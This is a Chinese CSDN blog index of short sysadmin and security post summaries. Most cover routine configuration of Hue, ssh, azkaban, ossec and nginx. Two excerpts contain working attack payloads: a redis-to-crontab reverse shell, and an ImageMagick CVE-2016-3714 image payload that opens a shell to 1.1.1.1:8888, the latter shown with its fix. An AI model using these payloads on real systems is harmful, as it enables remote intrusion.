- 博客(96)
- 收藏
- 关注
原创 hue连mysql查询条件包含中文时报错'latin-1' codec can't encode
这个问题找了好久,开始按网上的一些做法尝试在hue.ini中添加options={"init_command":"set names utf8;SET CHARACTER SET utf8;SET character_set_connection=utf8;"}但是重启hue后仍然没效果,最后搜到了一篇文章https://blog.csdn.net/supperman_009/artic...
2020-01-09 17:49:28 378
原创 系统中多个python版本通过pip安装方法
python2.7 -m pip install xxx #python2.7替换为需要pip安装的版本
2019-07-31 18:26:40 2211 1
原创 使用reptyr在screen中接管执行中进程
reptyr下载地址https://www.ostechnix.com/reptyr-move-running-process-new-terminal/当你开启了一个占用很长时间的进程,比如wget一个大文件,但是没有在screen等这种环境里打开,又不想占着一个窗口一直等待或者担心ssh中断导致进程退出,就可以使用reptyr了,使用方法也很简单,开启一个screen,在screen中执行...
2019-02-20 11:23:23 1661
原创 ssh配置免密登录失败的几种情况
1.最常见的,权限问题,.ssh目前权限要为700,authorized_keys权限要6002.部分操作系统里新创建的用户默认是锁定的,这种情况下认证失败在/var/log/secure中会看到如下错误Nov 21 11:04:26 host-xxxxx sshd[14011]: User test not allowed because account is lockedNov 21...
2018-11-21 11:29:00 10227
转载 【转】azkaban的部署过程中遇到的一些坑(部署篇)
转载自 https://my.oschina.net/u/2988360/blog/1537561注:azkaban之前有个配置文件默认要求6G以上可用内存的坑,解决完之后今天又遇到了代码写死3G以上内存的坑,根据报错信息正巧搜到了这篇文章,另外作者的主页https://my.oschina.net/u/2988360里也有其他几篇关于azkaban的文章,推荐1.azkaban源码下载...
2018-11-12 19:07:18 1420
转载 【转】redis利用姿势收集
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;测试环境:CentOS,RHEL# 利用crontab反弹shellredis-cli flushall echo -e "\n\n*/1 * * * * /bin/bash -i >& /...
2018-10-25 21:16:51 1546
原创 imagemaick的ghostscript RCE漏洞修复
漏洞信息可以参考imagemaick的ghost script RCE漏洞目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml在<policymap>标签中增加如下内容 <policy domain="co...
2018-08-24 14:20:39 828
原创 chrome另存为图片无响应解决方法
只要另存为图片浏览器就卡死,尝试重装chrome,清除缓存等仍然无效,最后参考http://tieba.baidu.com/p/2403437252先切换为系统自带的输入法在另存为图片,果然可以了,贴吧里面说的原因是“输入法的状态栏与chrome浏览器的另存为窗口冲突 可能是大家都在抢显示在最前面 ”,设置下输入法状态栏,改成嵌入式的,不用切换也好了,这里记录下...
2018-08-19 11:26:48 12504 1
原创 mysql中执行show full processlist命令条数过多显示不全问题的解决
其实很简单,show full processlist或者show processlist的结果都是从information_schema.processlist表取的结果,直接去查这个表就行了,还可以用sql按条件查询,更方便展示...
2018-04-25 15:05:56 6723
原创 推荐一个在线时序图网站
https://www.websequencediagrams.com/支持文字语法直接生成时序图比如自带的示例:title Authentication SequenceAlice->Bob: Authentication Requestnote right of Bob: Bob thinks about itBob->Alice: Authentication Response生...
2018-04-25 15:02:37 10185 1
原创 ossec集成自定义脚本
在使用ossec之前我们这边零零散散的写了几个安全功能的脚本,放在机器上要一直监控进程是不是存在,使用ossec后,可以通过在客户端的ossec.conf中增加如下内容 full_command /usr/bin/python xxx.py 10 其中frequency可以指定执行间隔时间,这里我设置的是10秒执行一次
2017-11-07 10:51:55 856
原创 auditd配置num_logs不生效解决方法
配置auditd的num_logs值为5,但是发现并不生效,初始配置大概是这样log_file = /xxx/xxx.loglog_format = RAWlog_group = rootpriority_boost = 4flush = INCREMENTALfreq = 20num_logs = 5disp_qos = lossydispatcher = /sbin/aud
2017-11-02 18:31:21 875
原创 ossec启动报ossec-remoted(1206): ERROR: Unable to Bind port错误解决方法
今天部署ossec,启动时ossec-remoted一直都无法启动,日志出现如下错误2017/10/20 16:43:53 ossec-remoted: INFO: Started (pid: 2699).2017/10/20 16:43:53 getaddrinfo: Name or service not known2017/10/20 16:43:53 ossec-remoted(1
2017-10-20 19:05:01 2008
原创 ssh连接失败自动重连脚本
一个简单的小脚本,有些任务需要ssh连接,如果失败的话可以自动不断重连直至成功#!/bin/bashwhile [ 0 -eq 0 ]do ssh $@ if [ $? -eq 0 ]; then break; else sleep 2 fidone使用也比较简单,保存为ssh.sh 执行sh ssh.sh user@
2017-10-18 14:32:33 2366
原创 azkaban任务延迟执行问题跟进
结论:在azkaban配置时如果filter有MinimumFreeMemory,会选择可用内存大于6GB的executor去执行任务,如所有的executor可用内存都不足6GB时则会分配executor失败,导致任务无法执行,一直到内存重新回到大于6GB分配executor成功,任务才会执行。分析过程:第一次出现问题是在8月4号,当时看了下日志,发现如下内容[ExecutorM
2017-08-23 15:49:25 6639 4
转载 又一篇azkaban源码分析
转载至http://www.ivanopt.com/deep-research-source-code-azkaban/本篇文章研究azkaban 调度器以下几个问题:1. Executor 和 Web Server 是如何交互的。2. Executor 的扩展是如何实现的。3. Executor 是如何执行即时任务的。我们从用户提交工作流作为入口,研究一下azka
2017-08-21 00:08:45 2998
转载 【转载】Azkaban源码分析
转载自http://www.acyouzi.com/2017/06/15/azkaban/简介因为 azkaban 功能比较简单,所以在实际使用中存在一些需求用对 azkaban 进行定制,比如:跨 Flow 依赖在 job 执行失败时短信报警Flow 的 start node 可能需要检测满足一定条件再触发(时间,数据是否就绪)可能需要设置 job 优先级,在集群
2017-08-20 20:50:12 3819
原创 当自动化安装遇到ncurse界面的解决方法(取消交互的通用方法)
要实现某个程序的自动化安装,但是在apt-get的时候就会遇到ncurse界面的交互在这里纠结了一会,最后在https://serverfault.com/questions/227190/how-do-i-ask-apt-get-to-skip-any-interactive-post-install-configuration-steps 找到了解决方案,执行DEBIAN_FR
2017-07-07 16:30:06 514
原创 安全应急方法-发现后门文件
主要指非web类后门,web类后门可参考一中的4及后面部分 1)记录文件stat信息,备份文件并删除 2)通过netstat -anltp命令可查看到当前连接信息及建立连接的进程pid,kill掉可疑连接的进程,且已知进程pid可以执行ls -al /proc/pid值 通过exe对应位置找到后门文件路径 3)通过ps aux命令检查是否存在其他可疑
2017-03-27 17:42:04 3613
原创 安全应急方法-站点页面被篡改
把自己工作中积累的一些经验写出来,希望对大家有帮助 1)找到被篡改页面,stat文件记录更改时间及用户等信息 2)将被篡改页面拷贝至其他非web目录,恢复正常页面 3)查看页面被篡改时间的accesslog,找出后门文件及操作ip(可能有多个ip访问后门,需要全部记录,重点记录第一个访问ip) 4)stat后门文件记录时间及操作用户等...
2017-03-27 17:39:14 3375 1
原创 nginx多条件判断
今天一个运维群里有人发了个需求“在nginx怎么拒绝这样的连接1 请求的目标是 / 请求的方法是 POST2 $http_user_agent 是Mozilla/5.0”我给出的方法如下:set $flag 0;if ($http_user_agent = Mozilla/5\.0\.) { set $flag "${flag}1";}location =
2017-03-20 18:43:11 2547 1
转载 centos安装freeipa
https://www.globo.tech/learning-center/install-freeipa-centos-7/ 文章说的是centos7,不过亲测centos6.6可安装,缺点是版本比较低,3.0.0的版本,有个证书两年到期的坑,证书到期的话可参考http://www.freeipa.org/page/IPA_2x_Certificate_Renewal
2017-03-14 19:10:32 2421
原创 linux根据uid反查用户名
auditd的日志只记录用户uid而不会显示对应用户名,看起来不是很友好,于是需要根据uid反查出用户名,但是有些用户是在ldap上的,因此也不能通过/etc/passwd来查,咨询了一下全栈工程师root,给了一条命令getent passwd uid查了一下果然可以,这里记录下,比如查询uid为33的用户名执行getent passwd 33返回如下结果www-data
2016-12-13 19:18:30 14214
原创 linux不用符号实现写文件
今天群里dark牛提出了一个场景,linux下不使用重定向或管道符如何实现写文件,机器不能外联,排除了wget -O curl -o等方法,非交互环境,排除了vim直接写文件,他当时想了一个写到log里然后mv的思路,但是有不少噪音,算不上完美,后来小伟哥提出一个用nohup实现的方法,这里记录一下dark牛也提出了一个先用dd创建一个非空文件然后sed替换的思路
2016-12-09 19:23:10 1144
原创 https站点调用百度地图api
一般加载百度地图api的地址为http://api.map.baidu.com/api?v=2.0&ak=ZUO**************AbM这种,里面的涉及的其他资源url也都全部写死为http了,这样导致的问题就是完全没法用,看了下相关文档,找到这个页面http://lbsyun.baidu.com/index.php?title=jspopular/guide/introduction#
2016-08-15 12:06:35 15549
原创 记录两个使用http2.0遇到的坑
因为苹果明年元旦开始要求苹果商店里的app使用连接必须都为https,因此最近在搞一些https+http2.0相关的调研,一开始就碰到两个小问题,这里记录下1.下载了新版nginx,修改了配置启用http2.0,但是发现无论如何都还是http1.1,后来看了https://iyaozhen.com/nginx-http2-conf.html 这篇文章,照着里面说的编译nginx的时候带了上新
2016-08-01 16:13:06 4995
转载 企业级集中身份认证及授权管理实践freeipa
注:转载自http://blog.csdn.net/xuyaqun/article/details/51596018 关于freeipa写的很全面,推荐一、背景 随着公司服务器、服务、用户越来越多,以前单机用户管理、单机sudo授权的方式已不是发展的要求,故需要做企业级的集中身份认证授权管理(比如:ldap、kerberos、ca、dns、sudo、密码策略),原因有三: 1、
2016-06-20 15:47:00 7746
原创 supervisor设置环境变量
今天在机器上配置supervisor守护flume进程的时候发现无法启动,报错是找不到JAVA_HOME,即使在flume_env.sh中配置了JAVA_HOME的路径也不行,后来网上搜了一下,supervisor在program的配置文件中有个environment配置,比如我的这个需求,在配置文件最下面增加environment=JAVA_HOME="xxxxxx"即可,如果多个环境变量用逗号
2016-06-02 11:22:06 19998
原创 ufw常用命令记录
ufw default allow #默认允许全部访问,如果希望仅白名单访问就把allow改成deny,切记改成deny后别急着开启ufw,否则啥都连不进来了。。ufw allow from 192.168.1.1 to any port 8888 #允许192.168.1.1访问8888端口 ufw deny 8888
2016-05-18 10:16:39 5470
原创 ImageMagick漏洞(cve-2016-3714)利用及修复
利用:如下内容保存为图片格式上传即可(命令部分自行替换)push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context修复(php):上传时先利用getimage
2016-05-05 17:09:55 5268 3
转载 运维日志排查常用shell
转载至:https://github.com/yaseng/pentest/blob/master/note/audit-log.md前言记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。常用命令查找关键词并统计行数cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l
2016-03-01 18:19:50 1094
原创 ssh卡在debug1: SSH2_MSG_KEXINIT sent解决方法
现象:主机间互通正常且可以判断对方ssh端口是开放的,但是用ssh xxx.xxx.xxx.xxx -v这种方式连接的时候会卡在debug1: SSH2_MSG_KEXINIT sent这步解决方法:echo "1454" > /sys/class/net/eth0/mtu原因:详情参考http://techbackground.blogspot.com/2013/06/path-mtu-
2016-02-23 10:14:11 14849
转载 Linux下grep显示前后几行信息
转自http://www.cnblogs.com/mfryf/p/3336288.htmlgrep -C 5 foo file 显示file文件里匹配foo字串那行以及上下5行grep -B 5 foo file 显示foo及前5行grep -A 5 foo file 显示foo及后5行
2016-02-02 17:38:42 924
原创 劫持事件处理中针对gzip压缩数据包的处理
现在各种运营商的劫持都比较猖獗,可能不少小伙伴都处理过劫持事件,一般的处理过程可参考http://security.tencent.com/index.php/blog/msg/10与http://security.tencent.com/index.php/blog/msg/81 抓包的方法这里提一下,打开一般都是手机连接wifi,电脑上设置代理,但是有些劫持发生在3g、4g这种,给大家提供
2016-01-14 10:05:34 2339
原创 freeipa热备配置过程
注:参考了http://my.oschina.net/u/142602/blog/186481 先在原ipaserver上执行如下命令 kinit adminipa-replica-prepare ipa2.xxx.comscp /var/lib/ipa/replica-info-ipa2.xxx.com.gpg root@ipa2.xxx.com:/root在热备主机上...
2016-01-12 10:36:37 3156
原创 redhat使用163的yum源
注:redhat系统设置163yum源过程,今天捣鼓了下,网上很多文章上记录的东西已经404了,记录下,方便自己也方便大家因为需要卸载系统自带的yum,此处先把后面装yum的一些包下载下来wget http://mirrors.163.com/centos/6.7/os/x86_64/Packages/yum-3.2.29-69.el6.centos.noarch.rpmwget htt
2016-01-11 20:11:26 2895
原创 常见弱点端口扫描(限速)
./nmap -sT -sV -p 21,80,443,873,2601,2604,3128,4440,6082,6379,8000,8008,8080,8081,8090,8099,8088,8888,9000,9090,9200,11211,27017,28017 --max-hostgroup 10 --max-parallelism 10 --max-rtt-timeout 1000ms
2015-12-22 10:28:58 1960
原创 cmd下传文件方法记录
注:以前写在百度空间的,转过来某个web的命令执行,windows主机,不像linux下可以通过wget下个文件很方便,开始尝试echo个vbs下载,如果直接在cmd下是没问题的,但是web端执行发现只要有逗号就连同后面的内容一起没了,后来又尝试一个转码脚本,反正试了半天最后还是没成功,网上找了找,发现了ftp这个方法,记录一下,本地先搭建一个ftp,假设用户名密码为admin/adm
2015-12-22 10:20:41 1524
原创 mysql通过存储过程实现aes加解密
前言:数据库难免会存一些敏感数据,密码可以用不可逆算法,但是有些东西本来就需要可逆,比如用户银行卡号、身份证号、手机号等,mysql自身提供了AES_ENCRYPT、AES_DECRYPT来实现aes的加解密,但是利用格式为AES_ENCRYPT('需要加密的字符','加解密用的key'),如果在代码层直接调用的话就会导致把key写的到处都是,那肯定不是大家想要的效果,于是这里自己搞了个存储过程,
2015-12-09 16:25:40 4211
原创 linux中对文件名包含空格时处理异常的解决方法
linux对文件批量操作时,比如如下命令(命令仅仅是举个例子,实际情况应该大多不会用cat):for i in `locate *.php|grep '/www/'`;do cat $i;done当文件名包含空格时,加入文件名为aaa bbb传入cat的时候会当成aaa与bbb两个文件,所以结果自然是提示找不到文件这种情况只要把$i替换成$(echo $i|sed 's/ /\
2015-09-22 16:54:01 1582
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人